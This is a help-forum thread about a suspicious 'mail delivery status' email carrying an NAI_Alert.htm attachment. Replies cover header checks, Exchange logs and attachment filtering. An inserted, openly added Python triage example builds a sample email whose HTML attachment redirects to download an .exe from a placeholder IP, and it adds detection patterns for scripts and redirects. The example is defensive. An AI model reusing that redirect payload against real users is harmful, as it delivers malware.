Possible virus??

A lot of people in our company have been receiving a suspicious email lately.  I haven't been able to find any information about this message at all, though.  The message has no from address, the subject is 'NOTICE: mail delivery status', the body is empty and there is an attachment called NAI_Alert.htm.  We have Norton 8.1, mostly Windows 98 machines, everyone uses Outlook 2000 and a Win NT 4 server.  Any ideas on what this is or how to stop the messages from coming?  The first reported time this message was received was about three weeks ago.  Since then more and more people have been receiving it.

Thank you.
Cuho Asked:
Focusyn Commented:
NAI alert is a Network Associates AntiVirus Software alert.  A legitimate email of this type would indicate that a message contained a virus and that the virus was removed from the email.  The file NAI_Alert.htm should provide details as to which virus, and when and where it was detected.  If you want to see where the messages are coming from, open one of the emails on a non-critical machine protected with the latest antivirus updates etc, and go in to the view options in Outlook.  Choose the "View Internet Header" option, which will display the header information for the email.  That should indicate the originating SMTP server from which the email arrived.  If there is no information in the header, then it likely came from somewhere within your organization.  Check to see if the server has a Network Associates antivirus product on it.  If you get no headers, you'll need to look in your Exchange server logs (try sort by date/time and match up with one of the received messages).  The server logs should again indicate from where and exactly when the message was delivered and to whom.  The difference in the Exchange logs is that if the mail originated from within your organization, it will be able to tell you that, as well as tell you the ip address and DNS info about the originating server even if the sender has masked the headers.

Important to note here, that many recent virii use delivery status messages to actually spread the virii as email worms.  They send alerts, undeliverable and failed status messages with attached files named alert.txt etc (file names used by popular email server antivirus products) and when or if you open that file, it is the actual virus payload.  That's why I suggest you open the message on a spare computer with the latest antivirus software.  If it's a legitimate email from somewhere, the htm file should contain info on the virus, and if it's not, then the htm file probably IS a virus, or malicious html code that redirects your computer to a direct download of the virus.  Rather than open the file, you may want to use save as, then "Open With" it with notepad.exe and look at the code to see whether there is an actual message in there or some kind of script or redirect.  That should give you some starting points to get you going.

As far as stopping them, you can create a server filter/rule that auto-deletes all messages containing attachments called NAI_Alert.htm before delivery to user mailboxes.
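To make the header check and attachment inspection above concrete, here is an added example (not code from this thread or from any vendor) that parses a constructed copy of such a message with Python's email library: it reports the earliest hop in the Received chain, flags the missing From and empty body, scans the .htm attachment for scripts or redirects, and applies the filename rule Focusyn suggests as a server-side filter. The sample message, the addresses in it and the block list are all constructed for illustration.

```python
import re
from email import message_from_bytes, policy

# Constructed sample of the message described in the question: no From header, subject
# 'NOTICE: mail delivery status', empty body, one NAI_Alert.htm attachment. Not a real capture.
SAMPLE_EML = b"""Received: from mailgw.example.net (mailgw.example.net [192.0.2.10])
\tby exch01.corp.example with ESMTP id ABC123; Mon, 05 May 2003 09:12:01 -0500
Received: from unknown (HELO host) (198.51.100.7)
\tby mailgw.example.net with SMTP; Mon, 05 May 2003 09:11:58 -0500
To: user@corp.example
Subject: NOTICE: mail delivery status
Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: text/plain

--XX
Content-Type: text/html; name="NAI_Alert.htm"
Content-Disposition: attachment; filename="NAI_Alert.htm"

<html><head><meta http-equiv="refresh" content="0;url=http://203.0.113.5/x.exe"></head></html>
--XX--
"""

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# HTML that does more than display a notice: scripts, meta refresh redirects, embedded objects.
ACTIVE_HTML = re.compile(r"""<script|http-equiv=["']?refresh|<iframe|<object""", re.I)
BLOCKED_NAMES = {"nai_alert.htm"}  # hypothetical block list for the server-side rule

def triage(raw: bytes) -> dict:
    """Collect the signals the answer above tells the asker to look for."""
    msg = message_from_bytes(raw, policy=policy.default)
    received = [" ".join(str(h).split()) for h in msg.get_all("Received", [])]
    # Each relay prepends its own Received line, so the last one is the earliest hop (the server
    # that first accepted the message); none at all suggests the mail was injected internally.
    ip = IPV4.search(received[-1]) if received else None
    body = msg.get_body(preferencelist=("plain", "html"))
    attachments = []
    for part in msg.iter_attachments():
        html = part.get_content() if part.get_content_type() == "text/html" else ""
        attachments.append({"name": (part.get_filename() or "").lower(),
                            "active_html": bool(ACTIVE_HTML.search(html))})
    return {"from_missing": not msg.get("From"), "hops": len(received),
            "origin_ip": ip.group(1) if ip else None,
            "body_empty": not (body and body.get_content().strip()),
            "attachments": attachments}

def should_block(report: dict) -> bool:
    """Server-side rule: drop on the blocked filename or an HTML attachment with active content."""
    return any(a["name"] in BLOCKED_NAMES or a["active_html"] for a in report["attachments"])
```

Run `triage(SAMPLE_EML)` against a saved .eml file's bytes to get the same report for a real message; a report with no hops points at the Exchange logs rather than the headers, as the answer says.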
knoxj81 Commented:
Cuho,

That is not a legit attachment. Internal or External it's obviously a worm. Check out: http://www.gfi.com/mailsecurity/  if you'd like to prevent future issues with worms and viruses within your network. The idea Focusyn suggested above is okay to prevent that one specific attachment, however what about tomorrow's threats and next week's? Trying to prevent attacks one at a time manually isn't going to work in a large network environment. You need a program that will handle that for you, update for you, and even give you reports to show you status.

Good Luck,

Jorden

**Please advise if you have any questions or concerns.**
Asta Cu (Technical consultant & graphic design) Commented:
I checked the McAfee site and did not see anything about this NAI_Alert.htm.  Could well be, as noted above, spoofed email and an intrusion.
http://ts.mcafeehelp.com/default.asp?siteID=1&resolution=1024x768&rurl=&rqs=
NAI_Alert.htm

For Office 2000, would highly recommend checking for updates and patches here to ensure you've got any protections available from MS .... http://www.officeupdate.com

We use McAfee, and can report such issues; suspect Norton has the same and may be worth a shot as well.

Cyber-Dude Commented:
No 'From' address and an HTML link?
My guess is that this file contains a link to a remote site to install some sort of trojan. If you have any Exchange-like server, there are many tools for you within that server to eliminate or prevent such mailings from appearing.

Cyber
Cuho (Author) Commented:
Thanks everyone.  The messages have stopped, for now.  I didn't get a chance to look into the source code of the htm file.  Because we use Norton, I will assume it is a trojan of some sort.  I'll post more when I know more.
Asta Cu (Technical consultant & graphic design) Commented:
Listening further when more is needed.
knoxj81 Commented:
astaec, many viruses, especially worms, generate random file names. This is important to prevent manual detection. People that just google the filename and/or check a vendor's website are better off going to multiple sites and scanning the file. Don't rely on a filename for detection.
Asta Cu (Technical consultant & graphic design) Commented:
Good point, knoxj81.  The variants and problems are ghastly and tough to isolate; they become more and more complex all the time and tougher to isolate and kill.  ":0) Asta
knoxj81 Commented:
exactly. =)
Cuho (Author) Commented:
OK, the message has stopped.  I spoke with my ISP and they do have McAfee but said these messages shouldn't get through to us.  I even looked at the source for the message and found nothing interesting at all.  I guess it was nothing.
Asta Cu (Technical consultant & graphic design) Commented:
Thank you.